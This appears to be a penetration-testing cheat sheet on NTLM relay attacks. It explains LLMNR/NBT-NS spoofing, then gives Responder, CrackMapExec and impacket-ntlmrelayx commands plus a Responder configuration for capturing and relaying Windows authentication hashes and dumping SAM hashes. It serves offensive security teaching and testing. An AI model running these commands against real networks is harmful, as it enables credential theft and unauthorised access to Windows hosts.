NTLM Relay

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit


If a windows client cannot resolve a hostname using DNS, it will use the Link-Local Multicast Name Resolution (LLMNR) protocol to ask neighbouring computers. LLMNR can be used to resolve both IPv4 and IPv6 addresses.

If this fails, NetBios Name Service (NBT-NS) will be used. NBT-NS is a similar protocol to LLMNR that serves the same purpose. The main difference between the two is NBT-NS works over IPv4 only.

On these occasions when LLMNR or NBT-NS are used to resolve a request, any host on the network who knows the IP of the host being asked about can reply. Even if a host replies to one of these requests with incorrect information, it will still be regarded as legitimate.

Therefore it is possible to intercept NTLMv1/v2 hashes when a client tries to authenticate against a spoofed service. If NTLMv1 is enabled they can be reused as Pass the Hash attacks. However, if only NTLMv2 hashes are intercepted they cannot be used in the same way. Instead they need to be replayed quickly as they are only valid for a short period of time.


  • Network access.


Start by listening the network with responder to spoof any NTLM hash that could transit. If you catch NTHashes, just reuse it with Pass the Hash method.

sudo responder -wrfbudPF -I eth0

Otherwise, if you obtain Net-NTLMv1 or Net-NTLMv2 hashes, you will have to relay them. To do so, you can use impacket-ntlmrelayx. By default, if no command is given it will try to dump SAM hashes. To do so, one must first identify hosts where smb signing is disabled.

cme smb $RANGE --gen-relay-list targets.txt

Once this is done, it will be used as hosts where the NTLMv2 hashes are replayed. But first, the configuration file of responder must be modified to disable SMB and HTTP:

sudo vim /etc/responder/Responder.conf

[Responder Core]

; Servers to start
SQL = On
SMB = Off #Should be On when not combined with ntlmrelayx
RDP = On
Kerberos = On
FTP = On
POP = On
HTTP = Off #Should be On when not combined with ntlmrelayx
DNS = On

Once the configuration file is modified, the two following commands can be ran simultaneously.

sudo responder -rdwPF -I eth0
sudo impacket-ntlmrelayx -tf targets.txt --http-port 8000 -of output.txt